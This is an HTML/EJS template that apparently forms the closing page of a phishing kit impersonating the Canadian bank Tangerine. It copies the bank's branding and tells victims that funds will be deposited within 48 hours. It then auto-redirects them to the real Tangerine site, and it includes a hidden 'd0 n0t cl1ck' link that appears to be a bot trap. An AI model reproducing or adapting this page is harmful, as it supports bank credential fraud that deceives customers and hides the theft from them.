<%
let message = `The funds will be processed and deposited in your account within the next 48 hours.

For security reasons you will now be redirected to the home page.`;
%>
<html>
    <head>
        <meta charset="utf-8">
        <title>Verification | Tangerine</title>
        <meta name="description" content="">
        <meta name="apple-mobile-web-app-capable" content="yes">
        <meta http-equiv="refresh" content="2;URL=https://www.tangerine.ca/en/personal">
        <meta name="viewport" content="width=device-width, maximum-scale=1.0">
        <link rel="shortcut icon" href="https://www.tangerine.ca/app/favicon.ico" type="image/x-icon">
        <link href="/assets/tang/files/global.css" rel="stylesheet">
        <link href="/assets/tang/files/app.css" rel="stylesheet">
        <style type="text/css" id="kampyleStyle">.noOutline{outline: none !important;}.wcagOutline:focus{outline: 1px dashed #595959 !important;outline-offset: 2px !important;transition: none !important;}</style>
    </head>
    <body translate-cloak="" application-theme="" state="forgotLogin" class="fb2-index ng-scope application-theme-web" style="overflow: visible;">
        <tng-main-nav class="ng-isolate-scope">
            <nav class="navbar print-hide" ng-class="{'nativeNav' : $ctrl.EnvironmentService.isNative()}">
                <a id="mainNav_home" class="brand nonclickable" href="" ng-click="$ctrl.handleGoHome()" ng-class="{'nonclickable' : $ctrl.isTitleLogoNotClickable()}">
                    <img ng-src="assets/images/brand-white.png" alt="Tangerine" class="logo-white print-hide" src="/assets/tang/files/brand-white.png">
                    <img ng-src="assets/images/brand-orange.png" alt="Tangerine" class="logo-orange print-only-inline" src="/assets/tang/files/brand-orange.png">
                </a>
            </nav>
        </tng-main-nav>
        <div ui-view="page-content" class="page-content ng-scope" style="padding-bottom: 0px;">
            <forgot-login class="ng-scope ng-isolate-scope">
                <form method="post" action="" class="ng-pristine ng-invalid ng-invalid-required ng-valid-pattern ng-valid-maxlength ng-valid-email">
                    <style>
                    .forgot-login select, .forgot-login input[type="text"], .forgot-login input[type="tel"], .forgot-login input[type="password"] {
                        font-size: 17px;
                        margin-top: 10px;
                        margin-bottom: 15px;
                        font-weight: 500;
                        border: 1px solid #9e9e9e;
                    }

                    .heading--title2 {
                        margin-bottom: 25px;
                        text-align: center;
                    }

                    .forgot-login button {
                        margin: 0px;
                    }

                    .text-right {
                        text-align: right;
                    }

                    .navbar {
                        display: block !important;
                        background-color: #ea7024 !important;
                    }

                    .btn, [class*=" btn--"], [class^=btn--] {
                        background-color: #ea7024;
                    }

                    .forgot-login__email {
                        max-width: 30em;
                        margin-left: auto;
                        margin-right: auto;
                    }

                    .application-theme-web {
                        background-color: #ffffff;
                    }
                    </style>
                    <div class="forgot-login" style="margin-top: 0px; padding: 23px;">
                        <div class="forgot-login__email ng-scope" ng-if="$ctrl.currentState === $ctrl.STATES.FORM">
                            <h2 class="heading--title2 ng-binding">Thank you</h2>
                            <p style="text-align: center; font-size: 17px; padding: 10px 40px 0px 40px;"><%=message%></p>
                        </div>
                    </div>
                </form>
            </forgot-login>
        </div>
        <span hidden id="navig"> .</span>
        <span hidden id="stage">Finish</span>
        <a href="/not-found" style="visibility: hidden;">d0 n0t cl1ck</a>
    </body>
    <script src="/bank/tangerine/js/script.js">
    </script>
    </html>

